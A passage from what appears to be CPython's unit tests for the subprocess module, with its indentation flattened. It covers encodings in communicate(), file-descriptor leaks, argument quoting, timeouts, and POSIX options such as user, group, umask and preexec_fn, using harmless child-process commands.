# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, os_helper.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen(ZERO_RETURN_CMD)
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
self.assertEqual(p.wait(timeout=support.SHORT_TIMEOUT), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen(ZERO_RETURN_CMD, None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen(ZERO_RETURN_CMD, bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
with self.assertWarnsRegex(RuntimeWarning, 'line buffering'):
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def test_nonexisting_with_pipes(self):
# bpo-30121: Popen with pipes must close properly pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=support.SHORT_TIMEOUT)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_repr(self):
# Run a command that waits for user input, to check the repr() of
# a Proc object while and after the sub-process runs.
code = 'import sys; input(); sys.exit(57)'
cmd = [sys.executable, '-c', code]
result = "<Popen: returncode: {}"
with subprocess.Popen(
cmd, stdin=subprocess.PIPE, universal_newlines=True) as proc:
self.assertIsNone(proc.returncode)
self.assertTrue(
repr(proc).startswith(result.format(proc.returncode)) and
repr(proc).endswith('>')
)
proc.communicate(input='exit...\n')
proc.wait()
self.assertIsNotNone(proc.returncode)
self.assertTrue(
repr(proc).startswith(result.format(proc.returncode)) and
repr(proc).endswith('>')
)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
ZERO_RETURN_CMD, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
def test_class_getitems(self):
self.assertIsInstance(subprocess.Popen[bytes], types.GenericAlias)
self.assertIsInstance(subprocess.CompletedProcess[str], types.GenericAlias)
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = subprocess.run(ZERO_RETURN_CMD, check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_run_with_pathlike_path(self):
# bpo-31961: test run(pathlike_object)
# the name of a command that can be run without
# any arguments that exit fast
prog = 'tree.com' if mswindows else 'ls'
path = shutil.which(prog)
if path is None:
self.skipTest(f'{prog} required for this test')
path = FakePath(path)
res = subprocess.run(path, stdout=subprocess.DEVNULL)
self.assertEqual(res.returncode, 0)
with self.assertRaises(TypeError):
subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
def test_run_with_bytes_path_and_arguments(self):
# bpo-31961: test run([bytes_object, b'additional arguments'])
path = os.fsencode(sys.executable)
args = [path, '-c', b'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_run_with_pathlike_path_and_arguments(self):
# bpo-31961: test run([pathlike_object, 'additional arguments'])
path = FakePath(sys.executable)
args = [path, '-c', 'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_capture_output(self):
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
# This test _might_ wind up a bit fragile on loaded build+test machines
# as it depends on the timing with wide enough margins for normal situations
# but does assert that it happened "soon enough" to believe the right thing
# happened.
@unittest.skipIf(mswindows, "requires posix like 'sleep' shell command")
def test_run_with_shell_timeout_and_capture_output(self):
"""Output capturing after a timeout mustn't hang forever on open filehandles."""
before_secs = time.monotonic()
try:
subprocess.run('sleep 3', shell=True, timeout=0.1,
capture_output=True) # New session unspecified.
except subprocess.TimeoutExpired as exc:
after_secs = time.monotonic()
stacks = traceback.format_exc() # assertRaises doesn't give this.
else:
self.fail("TimeoutExpired not raised.")
self.assertLess(after_secs - before_secs, 1.5,
msg="TimeoutExpired was delayed! Bad traceback:\n```\n"
f"{stacks}```")
def _get_test_grp_name():
for name_group in ('staff', 'nogroup', 'grp', 'nobody', 'nfsnobody'):
if grp:
try:
grp.getgrnam(name_group)
except KeyError:
continue
return name_group
else:
raise unittest.SkipTest('No identified group name to use for this test on this platform.')
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests we can forego
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called but there is no easy way
# to do that
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where its not
in the expected format"""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
# Anything can be in the pipe, no assumptions should
# be made about its encoding, so we'll write some
# arbitrary hex bytes to test it out
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
@unittest.skipIf(not os.path.exists('/proc/self/status'),
"need /proc/self/status")
def test_restore_signals(self):
# Blindly assume that cat exists on systems with /proc/self/status...
default_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=False)
for line in default_proc_status.splitlines():
if line.startswith(b'SigIgn'):
default_sig_ign_mask = line
break
else:
self.skipTest("SigIgn not found in /proc/self/status.")
restored_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=True)
for line in restored_proc_status.splitlines():
if line.startswith(b'SigIgn'):
restored_sig_ign_mask = line
break
self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
msg="restore_signals=True should've unblocked "
"SIGPIPE and friends.")
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c", "import os; print(os.getsid(0))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_sid = os.getsid(0)
child_sid = int(output)
self.assertNotEqual(parent_sid, child_sid)
@unittest.skipUnless(hasattr(os, 'setreuid'), 'no setreuid on platform')
def test_user(self):
# For code coverage of the user parameter. We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
uid = os.geteuid()
test_users = [65534 if uid != 65534 else 65533, uid]
name_uid = "nobody" if sys.platform != 'darwin' else "unknown"
if pwd is not None:
try:
pwd.getpwnam(name_uid)
test_users.append(name_uid)
except KeyError:
# unknown user name
name_uid = None
for user in test_users:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(user=user, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getuid())"],
user=user,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
except OSError as e:
if e.errno not in (errno.EACCES, errno.EPERM):
raise
else:
if isinstance(user, str):
user_uid = pwd.getpwnam(user).pw_uid
else:
user_uid = user
child_user = int(output)
self.assertEqual(child_user, user_uid)
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=-1)
if pwd is None and name_uid is not None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=name_uid)
@unittest.skipIf(hasattr(os, 'setreuid'), 'setreuid() available on platform')
def test_user_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=65535)
@unittest.skipUnless(hasattr(os, 'setregid'), 'no setregid() on platform')
def test_group(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
if grp is not None:
group_list.append(name_group)
for group in group_list + [gid]:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(group=group, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getgid())"],
group=group,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
else:
if isinstance(group, str):
group_gid = grp.getgrnam(group).gr_gid
else:
group_gid = group
child_group = int(output)
self.assertEqual(child_group, group_gid)
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=-1)
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=name_group)
@unittest.skipIf(hasattr(os, 'setregid'), 'setregid() available on platform')
def test_group_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=65535)
@unittest.skipUnless(hasattr(os, 'setgroups'), 'no setgroups() on platform')
def test_extra_groups(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
perm_error = False
if grp is not None:
group_list.append(name_group)
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os, sys, json; json.dump(os.getgroups(), sys.stdout)"],
extra_groups=group_list)
except OSError as ex:
if ex.errno != errno.EPERM:
raise
perm_error = True
else:
parent_groups = os.getgroups()
child_groups = json.loads(output)
if grp is not None:
desired_gids = [grp.getgrnam(g).gr_gid if isinstance(g, str) else g
for g in group_list]
else:
desired_gids = group_list
if perm_error:
self.assertEqual(set(child_groups), set(parent_groups))
else:
self.assertEqual(set(desired_gids), set(child_groups))
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[-1])
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD,
extra_groups=[name_group])
@unittest.skipIf(hasattr(os, 'setgroups'), 'setgroups() available on platform')
def test_extra_groups_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[])
@unittest.skipIf(mswindows or not hasattr(os, 'umask'),
'POSIX umask() is not available.')
def test_umask(self):
tmpdir = None
try:
tmpdir = tempfile.mkdtemp()
name = os.path.join(tmpdir, "beans")
# We set an unusual umask in the child so as a unique mode
# for us to test the child's touched file for.
subprocess.check_call(
[sys.executable, "-c", f"open({name!r}, 'w').close()"],
umask=0o053)
# Ignore execute permissions entirely in our test,
# filesystems could be mounted to ignore or force that.
st_mode = os.stat(name).st_mode & 0o666
expected_mode = 0o624
self.assertEqual(expected_mode, st_mode,
msg=f'{oct(expected_mode)} != {oct(st_mode)}')
finally:
if tmpdir is not None:
shutil.rmtree(tmpdir)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals intenum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
